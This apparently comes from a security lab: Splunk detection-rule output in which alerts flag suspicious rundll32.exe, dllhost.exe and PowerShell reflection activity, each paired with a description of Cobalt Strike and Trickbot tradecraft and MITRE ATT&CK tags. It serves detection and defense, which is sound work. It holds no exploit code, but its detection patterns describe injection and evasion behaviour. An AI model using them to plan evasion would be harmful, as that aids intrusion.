annotations.mitre_attack="T1055", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="0x3724", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1665003524, search_name="ESCU - Suspicious Rundll32 StartW - Rule", analyticstories="Cobalt Strike", analyticstories="Suspicious Rundll32 Activity", analyticstories="Trickbot", annotations="{\"analytic_story\": [\"Suspicious Rundll32 Activity\", \"Cobalt Strike\", \"Trickbot\"], \"cis20\": [\"CIS 8\"], \"confidence\": 50, \"context\": [\"Source:Endpoint\", \"Stage:Execution\", \"Stage:Initial Access\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Actions on Objectives\"], \"mitre_attack\": [\"T1218\", \"T1218.011\"], \"nist\": [\"PR.PT\", \"DE.CM\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Suspicious Rundll32 Activity", annotations.analytic_story="Cobalt Strike", annotations.analytic_story="Trickbot", annotations.cis20="CIS 8", annotations.context="Source:Endpoint", annotations.context="Stage:Execution", annotations.context="Stage:Initial Access", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1218", annotations.mitre_attack="T1218.011", annotations.nist="PR.PT", annotations.nist="DE.CM", count="1", dest="exchange01.attackrange.local", firstTime="2022-10-05T19:22:40", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-05T19:22:40", original_file_name="RUNDLL32.EXE", parent_process="C:\\Windows\\system32\\svchost.exe -k netsvcs", parent_process_id="1108", process="C:\\Windows\\system32\\rundll32.exe Startupscan.dll,SusRunTask", process_id="6512", process_name="rundll32.exe", risk_message="rundll32.exe running with suspicious parameters on exchange01.attackrange.local", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="35.0", savedsearch_description="The following analytic identifies rundll32.exe executing a DLL function name, Start and StartW, on the command line that is commonly observed with Cobalt Strike x86 and x64 DLL payloads. Rundll32.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64. Typically, the DLL will be written and loaded from a world writeable path or user location. In most instances it will not have a valid certificate (Unsigned). During investigation, review the parent process and other parallel application execution. Capture and triage the DLL in question. In the instance of Cobalt Strike, rundll32.exe is the default process it opens and injects shellcode into. This default process can be changed, but typically is not.", user="Administrator" 1665003524, search_name="ESCU - Suspicious Rundll32 StartW - Rule", analyticstories="Cobalt Strike", analyticstories="Suspicious Rundll32 Activity", analyticstories="Trickbot", annotations="{\"analytic_story\": [\"Suspicious Rundll32 Activity\", \"Cobalt Strike\", \"Trickbot\"], \"cis20\": [\"CIS 8\"], \"confidence\": 50, \"context\": [\"Source:Endpoint\", \"Stage:Execution\", \"Stage:Initial Access\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Actions on Objectives\"], \"mitre_attack\": [\"T1218\", \"T1218.011\"], \"nist\": [\"PR.PT\", \"DE.CM\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Suspicious Rundll32 Activity", annotations.analytic_story="Cobalt Strike", annotations.analytic_story="Trickbot", annotations.cis20="CIS 8", annotations.context="Source:Endpoint", annotations.context="Stage:Execution", annotations.context="Stage:Initial Access", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1218", annotations.mitre_attack="T1218.011", annotations.nist="PR.PT", annotations.nist="DE.CM", count="1", dest="exchange01.attackrange.local", firstTime="2022-10-05T19:22:40", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-05T19:22:40", original_file_name="unknown", parent_process="C:\\Windows\\System32\\svchost.exe", parent_process_id="0x454", process="C:\\Windows\\system32\\rundll32.exe Startupscan.dll,SusRunTask", process_id="0x1970", process_name="rundll32.exe", risk_message="rundll32.exe running with suspicious parameters on exchange01.attackrange.local", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="35.0", savedsearch_description="The following analytic identifies rundll32.exe executing a DLL function name, Start and StartW, on the command line that is commonly observed with Cobalt Strike x86 and x64 DLL payloads. Rundll32.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64. Typically, the DLL will be written and loaded from a world writeable path or user location. In most instances it will not have a valid certificate (Unsigned). During investigation, review the parent process and other parallel application execution. Capture and triage the DLL in question. In the instance of Cobalt Strike, rundll32.exe is the default process it opens and injects shellcode into. This default process can be changed, but typically is not.", user="Administrator" 1664996400, search_name="ESCU - Suspicious Rundll32 no Command Line Arguments - Rule", orig_time="1664996400", analyticstories="Cobalt Strike", analyticstories="PrintNightmare CVE-2021-34527", analyticstories="Suspicious Rundll32 Activity", annotations="{\"analytic_story\": [\"Suspicious Rundll32 Activity\", \"Cobalt Strike\", \"PrintNightmare CVE-2021-34527\"], \"cis20\": [\"CIS 8\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Execution\", \"Stage:Initial Access\", \"Stage:Defense Evasion\"], \"cve\": [\"CVE-2021-34527\"], \"impact\": 70, \"kill_chain_phases\": [\"Actions on Objectives\"], \"mitre_attack\": [\"T1218\", \"T1218.011\"], \"nist\": [\"PR.PT\", \"DE.CM\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Suspicious Rundll32 Activity", annotations.analytic_story="Cobalt Strike", annotations.analytic_story="PrintNightmare CVE-2021-34527", annotations.cis20="CIS 8", annotations.context="Source:Endpoint", annotations.context="Stage:Execution", annotations.context="Stage:Initial Access", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-34527", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1218", annotations.mitre_attack="T1218.011", annotations.nist="PR.PT", annotations.nist="DE.CM", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\rundll32.exe", process_id="7624", process_name="rundll32.exe", process_path="C:\\Windows\\System32\\rundll32.exe", risk_message="Suspicious rundll32.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies rundll32.exe with no command line arguments. It is unusual for rundll32.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. Rundll32.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664996400, search_name="ESCU - Suspicious Rundll32 no Command Line Arguments - Rule", orig_time="1664996400", analyticstories="Cobalt Strike", analyticstories="PrintNightmare CVE-2021-34527", analyticstories="Suspicious Rundll32 Activity", annotations="{\"analytic_story\": [\"Suspicious Rundll32 Activity\", \"Cobalt Strike\", \"PrintNightmare CVE-2021-34527\"], \"cis20\": [\"CIS 8\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Execution\", \"Stage:Initial Access\", \"Stage:Defense Evasion\"], \"cve\": [\"CVE-2021-34527\"], \"impact\": 70, \"kill_chain_phases\": [\"Actions on Objectives\"], \"mitre_attack\": [\"T1218\", \"T1218.011\"], \"nist\": [\"PR.PT\", \"DE.CM\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Suspicious Rundll32 Activity", annotations.analytic_story="Cobalt Strike", annotations.analytic_story="PrintNightmare CVE-2021-34527", annotations.cis20="CIS 8", annotations.context="Source:Endpoint", annotations.context="Stage:Execution", annotations.context="Stage:Initial Access", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-34527", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1218", annotations.mitre_attack="T1218.011", annotations.nist="PR.PT", annotations.nist="DE.CM", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\SysWOW64\\rundll32.exe", process_id="19784", process_name="rundll32.exe", process_path="C:\\Windows\\SysWOW64\\rundll32.exe", risk_message="Suspicious rundll32.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies rundll32.exe with no command line arguments. It is unusual for rundll32.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. Rundll32.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664996400, search_name="ESCU - Suspicious Rundll32 no Command Line Arguments - Rule", orig_time="1664996400", analyticstories="Cobalt Strike", analyticstories="PrintNightmare CVE-2021-34527", analyticstories="Suspicious Rundll32 Activity", annotations="{\"analytic_story\": [\"Suspicious Rundll32 Activity\", \"Cobalt Strike\", \"PrintNightmare CVE-2021-34527\"], \"cis20\": [\"CIS 8\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Execution\", \"Stage:Initial Access\", \"Stage:Defense Evasion\"], \"cve\": [\"CVE-2021-34527\"], \"impact\": 70, \"kill_chain_phases\": [\"Actions on Objectives\"], \"mitre_attack\": [\"T1218\", \"T1218.011\"], \"nist\": [\"PR.PT\", \"DE.CM\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Suspicious Rundll32 Activity", annotations.analytic_story="Cobalt Strike", annotations.analytic_story="PrintNightmare CVE-2021-34527", annotations.cis20="CIS 8", annotations.context="Source:Endpoint", annotations.context="Stage:Execution", annotations.context="Stage:Initial Access", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-34527", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1218", annotations.mitre_attack="T1218.011", annotations.nist="PR.PT", annotations.nist="DE.CM", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\rundll32.exe", process_id="19732", process_name="rundll32.exe", process_path="C:\\Windows\\System32\\rundll32.exe", risk_message="Suspicious rundll32.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies rundll32.exe with no command line arguments. It is unusual for rundll32.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. Rundll32.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664996400, search_name="ESCU - Suspicious Rundll32 no Command Line Arguments - Rule", orig_time="1664996400", analyticstories="Cobalt Strike", analyticstories="PrintNightmare CVE-2021-34527", analyticstories="Suspicious Rundll32 Activity", annotations="{\"analytic_story\": [\"Suspicious Rundll32 Activity\", \"Cobalt Strike\", \"PrintNightmare CVE-2021-34527\"], \"cis20\": [\"CIS 8\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Execution\", \"Stage:Initial Access\", \"Stage:Defense Evasion\"], \"cve\": [\"CVE-2021-34527\"], \"impact\": 70, \"kill_chain_phases\": [\"Actions on Objectives\"], \"mitre_attack\": [\"T1218\", \"T1218.011\"], \"nist\": [\"PR.PT\", \"DE.CM\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Suspicious Rundll32 Activity", annotations.analytic_story="Cobalt Strike", annotations.analytic_story="PrintNightmare CVE-2021-34527", annotations.cis20="CIS 8", annotations.context="Source:Endpoint", annotations.context="Stage:Execution", annotations.context="Stage:Initial Access", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-34527", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1218", annotations.mitre_attack="T1218.011", annotations.nist="PR.PT", annotations.nist="DE.CM", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\rundll32.exe", process_id="18692", process_name="rundll32.exe", process_path="C:\\Windows\\System32\\rundll32.exe", risk_message="Suspicious rundll32.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies rundll32.exe with no command line arguments. It is unusual for rundll32.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. Rundll32.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664996400, search_name="ESCU - Suspicious Rundll32 no Command Line Arguments - Rule", orig_time="1664996400", analyticstories="Cobalt Strike", analyticstories="PrintNightmare CVE-2021-34527", analyticstories="Suspicious Rundll32 Activity", annotations="{\"analytic_story\": [\"Suspicious Rundll32 Activity\", \"Cobalt Strike\", \"PrintNightmare CVE-2021-34527\"], \"cis20\": [\"CIS 8\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Execution\", \"Stage:Initial Access\", \"Stage:Defense Evasion\"], \"cve\": [\"CVE-2021-34527\"], \"impact\": 70, \"kill_chain_phases\": [\"Actions on Objectives\"], \"mitre_attack\": [\"T1218\", \"T1218.011\"], \"nist\": [\"PR.PT\", \"DE.CM\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Suspicious Rundll32 Activity", annotations.analytic_story="Cobalt Strike", annotations.analytic_story="PrintNightmare CVE-2021-34527", annotations.cis20="CIS 8", annotations.context="Source:Endpoint", annotations.context="Stage:Execution", annotations.context="Stage:Initial Access", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-34527", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1218", annotations.mitre_attack="T1218.011", annotations.nist="PR.PT", annotations.nist="DE.CM", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\SysWOW64\\rundll32.exe", process_id="0x4d48", process_name="rundll32.exe", process_path="C:\\Windows\\SysWOW64\\rundll32.exe", risk_message="Suspicious rundll32.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies rundll32.exe with no command line arguments. It is unusual for rundll32.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. Rundll32.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664996400, search_name="ESCU - Suspicious Rundll32 no Command Line Arguments - Rule", orig_time="1664996400", analyticstories="Cobalt Strike", analyticstories="PrintNightmare CVE-2021-34527", analyticstories="Suspicious Rundll32 Activity", annotations="{\"analytic_story\": [\"Suspicious Rundll32 Activity\", \"Cobalt Strike\", \"PrintNightmare CVE-2021-34527\"], \"cis20\": [\"CIS 8\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Execution\", \"Stage:Initial Access\", \"Stage:Defense Evasion\"], \"cve\": [\"CVE-2021-34527\"], \"impact\": 70, \"kill_chain_phases\": [\"Actions on Objectives\"], \"mitre_attack\": [\"T1218\", \"T1218.011\"], \"nist\": [\"PR.PT\", \"DE.CM\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Suspicious Rundll32 Activity", annotations.analytic_story="Cobalt Strike", annotations.analytic_story="PrintNightmare CVE-2021-34527", annotations.cis20="CIS 8", annotations.context="Source:Endpoint", annotations.context="Stage:Execution", annotations.context="Stage:Initial Access", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-34527", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1218", annotations.mitre_attack="T1218.011", annotations.nist="PR.PT", annotations.nist="DE.CM", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\rundll32.exe", process_id="0x4d14", process_name="rundll32.exe", process_path="C:\\Windows\\System32\\rundll32.exe", risk_message="Suspicious rundll32.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies rundll32.exe with no command line arguments. It is unusual for rundll32.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. Rundll32.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664996400, search_name="ESCU - Suspicious Rundll32 no Command Line Arguments - Rule", orig_time="1664996400", analyticstories="Cobalt Strike", analyticstories="PrintNightmare CVE-2021-34527", analyticstories="Suspicious Rundll32 Activity", annotations="{\"analytic_story\": [\"Suspicious Rundll32 Activity\", \"Cobalt Strike\", \"PrintNightmare CVE-2021-34527\"], \"cis20\": [\"CIS 8\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Execution\", \"Stage:Initial Access\", \"Stage:Defense Evasion\"], \"cve\": [\"CVE-2021-34527\"], \"impact\": 70, \"kill_chain_phases\": [\"Actions on Objectives\"], \"mitre_attack\": [\"T1218\", \"T1218.011\"], \"nist\": [\"PR.PT\", \"DE.CM\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Suspicious Rundll32 Activity", annotations.analytic_story="Cobalt Strike", annotations.analytic_story="PrintNightmare CVE-2021-34527", annotations.cis20="CIS 8", annotations.context="Source:Endpoint", annotations.context="Stage:Execution", annotations.context="Stage:Initial Access", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-34527", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1218", annotations.mitre_attack="T1218.011", annotations.nist="PR.PT", annotations.nist="DE.CM", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\rundll32.exe", process_id="0x4904", process_name="rundll32.exe", process_path="C:\\Windows\\System32\\rundll32.exe", risk_message="Suspicious rundll32.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies rundll32.exe with no command line arguments. It is unusual for rundll32.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. Rundll32.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664996400, search_name="ESCU - Suspicious Rundll32 no Command Line Arguments - Rule", orig_time="1664996400", analyticstories="Cobalt Strike", analyticstories="PrintNightmare CVE-2021-34527", analyticstories="Suspicious Rundll32 Activity", annotations="{\"analytic_story\": [\"Suspicious Rundll32 Activity\", \"Cobalt Strike\", \"PrintNightmare CVE-2021-34527\"], \"cis20\": [\"CIS 8\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Execution\", \"Stage:Initial Access\", \"Stage:Defense Evasion\"], \"cve\": [\"CVE-2021-34527\"], \"impact\": 70, \"kill_chain_phases\": [\"Actions on Objectives\"], \"mitre_attack\": [\"T1218\", \"T1218.011\"], \"nist\": [\"PR.PT\", \"DE.CM\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Suspicious Rundll32 Activity", annotations.analytic_story="Cobalt Strike", annotations.analytic_story="PrintNightmare CVE-2021-34527", annotations.cis20="CIS 8", annotations.context="Source:Endpoint", annotations.context="Stage:Execution", annotations.context="Stage:Initial Access", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-34527", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1218", annotations.mitre_attack="T1218.011", annotations.nist="PR.PT", annotations.nist="DE.CM", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\rundll32.exe", process_id="0x1dc8", process_name="rundll32.exe", process_path="C:\\Windows\\System32\\rundll32.exe", risk_message="Suspicious rundll32.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies rundll32.exe with no command line arguments. It is unusual for rundll32.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. Rundll32.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664996400, search_name="ESCU - Suspicious Rundll32 no Command Line Arguments - Rule", orig_time="1664996400", analyticstories="Cobalt Strike", analyticstories="PrintNightmare CVE-2021-34527", analyticstories="Suspicious Rundll32 Activity", annotations="{\"analytic_story\": [\"Suspicious Rundll32 Activity\", \"Cobalt Strike\", \"PrintNightmare CVE-2021-34527\"], \"cis20\": [\"CIS 8\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Execution\", \"Stage:Initial Access\", \"Stage:Defense Evasion\"], \"cve\": [\"CVE-2021-34527\"], \"impact\": 70, \"kill_chain_phases\": [\"Actions on Objectives\"], \"mitre_attack\": [\"T1218\", \"T1218.011\"], \"nist\": [\"PR.PT\", \"DE.CM\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Suspicious Rundll32 Activity", annotations.analytic_story="Cobalt Strike", annotations.analytic_story="PrintNightmare CVE-2021-34527", annotations.cis20="CIS 8", annotations.context="Source:Endpoint", annotations.context="Stage:Execution", annotations.context="Stage:Initial Access", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-34527", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1218", annotations.mitre_attack="T1218.011", annotations.nist="PR.PT", annotations.nist="DE.CM", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\rundll32.exe", process_id="0x1970", process_name="rundll32.exe", process_path="C:\\Windows\\System32\\rundll32.exe", risk_message="Suspicious rundll32.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies rundll32.exe with no command line arguments. It is unusual for rundll32.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. Rundll32.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1665003331, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-05T19:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-05T19:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1665003331, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-05T19:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-05T19:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return 